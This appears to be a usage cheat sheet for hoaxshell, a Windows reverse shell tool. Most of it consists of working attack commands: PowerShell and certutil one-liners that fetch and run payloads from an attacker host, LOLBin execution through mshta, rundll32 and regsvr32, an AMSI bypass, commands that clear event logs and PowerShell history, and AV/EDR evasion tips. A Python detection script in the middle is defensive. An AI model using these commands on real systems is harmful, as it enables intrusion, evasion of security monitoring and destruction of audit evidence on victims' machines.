
hoaxshell

hoaxshell is a Python-based reverse shell generator and handler that leverages legitimate Windows utilities (certutil, PowerShell, cmd) to establish encrypted reverse shells. It bypasses traditional AV/EDR detection through encrypted traffic, legitimate process chains, and unconventional execution methods.

Key Features:

  • Encrypted reverse shell connections (AES-256)
  • Multiple payload delivery mechanisms
  • HTTPS support with certificate handling
  • Session management and interactive shell
  • Low AV/EDR detection rates
  • Supports staged and stageless payloads

```bash
# Clone the repository
git clone https://github.com/t3l3machus/hoaxshell.git
cd hoaxshell

# Install Python dependencies
pip3 install -r requirements.txt

# Make executable
chmod +x hoaxshell.py
```

Requirements:

  • Python 3.7+
  • requests library
  • Windows target system
  • Network connectivity (C2 → Target)

```bash
# Start the hoaxshell handler
python3 hoaxshell.py

# Listen on specific IP/port
python3 hoaxshell.py -s <IP> -p <PORT>

# Use HTTPS with certificate
python3 hoaxshell.py -s <IP> -p <PORT> --ssl --cert /path/to/cert.pem --key /path/to/key.pem

# Specify encryption key (for reproducibility)
python3 hoaxshell.py -s <IP> -p <PORT> -k <ENCRYPTION_KEY>

# Verbose output
python3 hoaxshell.py -s <IP> -p <PORT> -v
```

Handler Options:

| Option | Description |
|---|---|
| `-s, --server` | Listener IP address (default: 0.0.0.0) |
| `-p, --port` | Listener port (default: 8888) |
| `--ssl` | Enable HTTPS/TLS |
| `--cert` | Path to SSL certificate |
| `--key` | Path to SSL private key |
| `-k, --key` | Custom encryption key (32 bytes) |
| `-v, --verbose` | Verbose logging |


```powershell
# Basic PowerShell reverse shell
$ip='<ATTACKER_IP>'; $port=<PORT>; $key='<ENCRYPTION_KEY>'; iex(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/path/to/payload')

# Direct execution
powershell -Command "IEX(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/<SESSION_ID>')"

# Obfuscated execution
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/<SESSION_ID>')"
```


```bat
:: Using certutil for file download + execution
certutil -urlcache -split -f "http://<ATTACKER_IP>:<PORT>/<SESSION_ID>" c:\windows\temp\shell.ps1 && powershell -File c:\windows\temp\shell.ps1

:: One-liner
cmd /c "certutil -urlcache -split -f http://<ATTACKER_IP>:<PORT>/<SESSION_ID> %temp%\s.ps1 && powershell -File %temp%\s.ps1"
```


```bat
:: Download and execute in memory
certutil -urlcache -f "http://<ATTACKER_IP>:<PORT>/download" || powershell -Command "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/<SESSION_ID>'))))"
```

The handler generates unique payloads with embedded session IDs:

```text
# View generated payloads
# Displayed in handler output after startup
# Format: http://<LISTENER>:<PORT>/<SESSION_ID>

# Each payload contains:
# - Unique session identifier
# - Encrypted communication protocol
# - AES-256 key embedded (if not randomized)
```

Once a session connects, interact with the reverse shell:

| Command | Description |
|---|---|
| `help` | Display available commands |
| `sessions` | List active sessions |
| `interact <ID>` | Switch to session ID |
| `exec <command>` | Execute command in current session |
| `pwd` | Print working directory |
| `cd <path>` | Change directory |
| `exit` | Close current session |
| `kill <ID>` | Terminate session |
| `clear` | Clear screen |

Interactive Shell Example:

```text
[+] Session 1 connected (192.168.1.100:54321)
hoaxshell> interact 1
[*] Interacting with Session 1
Session_1> whoami
DOMAIN\username
Session_1> ipconfig /all
[output]
```

  • Algorithm: AES-256-CBC
  • Mode: CBC with PKCS7 padding
  • IV: Randomly generated per request
  • Key Exchange: Pre-shared (embedded in payload or handler)

Traffic Flow:

```text
Client: Encrypted(Command) → Server:PORT
Server: Encrypted(Response) → Client
```


```bash
# Generate self-signed certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Run handler with HTTPS
python3 hoaxshell.py -s <IP> -p <PORT> --ssl --cert cert.pem --key key.pem
```

Update payload to use HTTPS:

```powershell
$ip='<ATTACKER_IP>'; $port=<PORT>;
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}
iex(New-Object System.Net.WebClient).DownloadString('https://<ATTACKER_IP>:<PORT>/<SESSION_ID>')
```


```text
hoaxshell> sessions
[*] Active sessions:
    [1] 192.168.1.100:54321 (Windows 10 - Administrator)
    [2] 192.168.1.101:54322 (Windows Server 2019 - System)
```


```text
# Get output from last command
hoaxshell> grab

# Force refresh session data
hoaxshell> grab --force

# Get session info
hoaxshell> info <SESSION_ID>
```


```text
# Execute single command
hoaxshell> exec whoami
DOMAIN\username

# Multi-line commands
hoaxshell> exec "Get-Process | Select-Object Name, CPU | Sort CPU -Descending | Select -First 10"

# Command output redirection
hoaxshell> exec "ipconfig > c:\windows\temp\ip.txt"
```


```bat
:: Execution via rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write(new ActiveXObject("WScript.Shell").Exec("powershell -Command ...").StdOut.ReadAll());

:: Execution via mshta
mshta vbscript:CreateObject("WScript.Shell").Run("powershell -Command ...",0)(window.close)

:: Execution via regsvcs
regsvcs.exe C:\path\to\assembly.dll
```


```bat
:: certutil for download
certutil -urlcache -f "http://attacker:port/payload" c:\temp\s.exe

:: bitsadmin alternative
bitsadmin /transfer job /download /resume "http://attacker:port/payload" c:\temp\s.exe

:: msiexec execution
msiexec /i "http://attacker:port/payload.msi"

:: regsvr32 + scrobj.dll
regsvr32 /s /n /u /i:http://attacker:port/payload.sct scrobj.dll
```


| Technique | Implementation |
|---|---|
| Traffic Encryption | AES-256 in hoaxshell (enabled by default) |
| HTTPS | Use `--ssl` flag with valid certificates |
| Process Injection | Execute from legitimate processes (PowerShell, cmd, rundll32) |
| Obfuscation | Use `-NoP -NonI -W Hidden -Exec Bypass` in PowerShell |
| Anti-Sandbox | Check for VM artifacts before execution |
| Beacon Timing | Randomize callback intervals in custom variants |
| Code Signing | Sign payloads with valid certificates |


```text
# Default behavior - full PowerShell environment
Session_1> $PSVersionTable
PSVersion      5.1.19041.1387

Session_1> Get-Credential
# Prompt for credentials (interactive)

# CMD shell access
Session_1> cmd /c whoami

# Constrained language mode detection
Session_1> $ExecutionContext.SessionState.LanguageMode
FullLanguage
```


```text
# Upload file to target
hoaxshell> upload /local/path/file.exe c:\windows\temp\file.exe

# Download file from target
hoaxshell> download c:\windows\temp\output.txt /local/path/output.txt
```


| Constraint | Impact | Workaround |
|---|---|---|
| Firewalls | Outbound connections blocked | Use HTTP/443, proxy chaining |
| Proxy Requirements | Handler unreachable directly | Configure system proxy, CONNECT tunneling |
| DNS Filtering | Domain blocked | Use IP-based callbacks, DNS tunneling |

  • Network Signatures: Unusual HTTP User-Agents, abnormal certificate patterns
  • Behavioral: certutil download activity, PowerShell conhost spawning
  • Registry: PowerShell execution policy changes, script block logging
  • EDR Telemetry: API call patterns, module loading
  • Persistence: No built-in persistence mechanism (use separate implant)
  • Lateral Movement: Limited by initial compromise privilege
  • Detection Window: EDR hooks may block execution mid-session
  • Code Execution: AMSI may block obfuscated code without bypass
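The detection indicators listed above (certutil download activity, PowerShell download cradles launched with hidden/bypass switches, script-host LOLBins, log clearing, AMSI tampering) can be expressed as command-line rules. The following is an added example written for this page, not hoaxshell's own code or the page's; the event field names, sample command lines and rule weights are constructed assumptions, not real telemetry.

```python
"""Added detection example, not part of hoaxshell. Runs the indicators listed above
(certutil downloads, PowerShell download cradles with hidden/bypass switches, script-host
LOLBins, log clearing, AMSI tampering) over constructed process-creation events."""
import re

# Constructed events shaped like Sysmon Event ID 1 / Security 4688 process creation.
SAMPLE_EVENTS = [
    {"pid": 4120, "cmdline": r'certutil -urlcache -split -f "http://203.0.113.10:8888/a1b2c3" c:\windows\temp\shell.ps1'},
    {"pid": 4121, "cmdline": "powershell -NoP -NonI -W Hidden -Exec Bypass -Command "
                             "\"IEX(New-Object System.Net.WebClient).DownloadString('http://203.0.113.10:8888/a1b2c3')\""},
    {"pid": 4122, "cmdline": r'cmd /c "certutil -urlcache -split -f http://203.0.113.10:8888/a1b2c3 %temp%\s.ps1 && powershell -File %temp%\s.ps1"'},
    {"pid": 4123, "cmdline": "wevtutil cl Security"},
    {"pid": 4124, "cmdline": "certutil -verify -urlfetch mycert.cer"},   # benign certutil use
    {"pid": 4125, "cmdline": "powershell -NoProfile -Command Get-Date"},  # benign PowerShell use
]

# (rule name, weight, compiled pattern over the command line). Weights are illustrative.
RULES = [
    ("certutil_urlcache_download", 3, re.compile(r"certutil(\.exe)?\s.*-urlcache\s.*-f\s", re.I)),
    ("certutil_to_powershell_chain", 2, re.compile(r"certutil.*&&\s*powershell", re.I)),
    ("powershell_download_cradle", 3, re.compile(r"DownloadString\(|FromBase64String\(", re.I)),
    ("powershell_hidden_or_bypass", 1, re.compile(r"-W(indowStyle)?\s+Hidden|-Exec(utionPolicy)?\s+Bypass", re.I)),
    ("script_host_lolbin", 3, re.compile(r"\b(mshta|rundll32)(\.exe)?\s+(vbscript|javascript):", re.I)),
    ("amsi_init_failed_tamper", 5, re.compile(r"amsiInitFailed", re.I)),
    ("event_log_cleared", 5, re.compile(r"wevtutil(\.exe)?\s+cl\s", re.I)),
]
ALERT_THRESHOLD = 3  # one strong hit, or two weaker correlated hits, raises an alert

def match_event(event):
    """Return (rule names, total weight) for one event; benign lines return ([], 0)."""
    hits = [(name, w) for name, w, rx in RULES if rx.search(event["cmdline"])]
    return [n for n, _ in hits], sum(w for _, w in hits)

def triage(events):
    """Map pid -> matched rule names for every event whose weight reaches the threshold.
    Co-occurring hits (download cradle + hidden/bypass switches) score higher than either alone."""
    alerts = {}
    for ev in events:
        names, weight = match_event(ev)
        if weight >= ALERT_THRESHOLD:
            alerts[ev["pid"]] = names
    return alerts

if __name__ == "__main__":
    for pid, names in triage(SAMPLE_EVENTS).items():
        print(f"ALERT pid={pid}: {', '.join(names)}")
```

Real deployments would match on parsed fields (image path, parent process, user) rather than a raw string, and tune the weights against the environment's baseline of legitimate certutil and PowerShell use.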

```text
# 1. Use HTTPS with valid certificates
python3 hoaxshell.py -s <IP> -p 443 --ssl --cert legit.pem --key legit.key

# 2. Minimize command history
hoaxshell> history clear

# 3. Use unique encryption keys per campaign
python3 hoaxshell.py -k $(openssl rand -hex 16)

# 4. Clean up artifacts on exit
Session_1> Remove-Item c:\windows\temp\*.ps1 -Force
```


```powershell
# Disable PowerShell history
Set-PSReadLineKeyHandler -Key Tab -Function MenuComplete
Remove-Item (Get-PSReadlineOption).HistorySavePath

# Disable audit logging (if admin)
wevtutil cl Security
wevtutil cl PowerShell

# Disable AMSI (bypass)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)
```

  • Randomize callback intervals in modified versions
  • Use legitimate-looking User-Agents
  • Blend traffic with normal HTTP patterns
  • Consider proxy redirection vs direct connections
  • Rotate listener IPs/ports between engagements

```bash
# Test network access
python3 -c "import socket; s=socket.socket(); s.connect(('<IP>', <PORT>))"

# Enable verbose logging
python3 hoaxshell.py -s 0.0.0.0 -p 8888 -v

# Confirm the handler is bound and listening on its port
netstat -tlnp | grep 8888
```


```powershell
# Test script execution
powershell -ExecutionPolicy Bypass -NoProfile -Command "whoami"

# Verify connectivity from target
(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>')

# Check proxy settings
netsh winhttp show proxy
```

  • Increase reconnection timeout in handler
  • Verify target-to-C2 network path
  • Check encryption key consistency
  • Review EDR/AV logs for blocking activity
  • GitHub: github.com/t3l3machus/hoaxshell
  • Living Off The Land: lolbas-project.github.io
  • Windows AV/EDR Evasion: attacktorium.com/blog/av-evasion
  • PowerShell Obfuscation: github.com/danielbohannon/Invoke-Obfuscation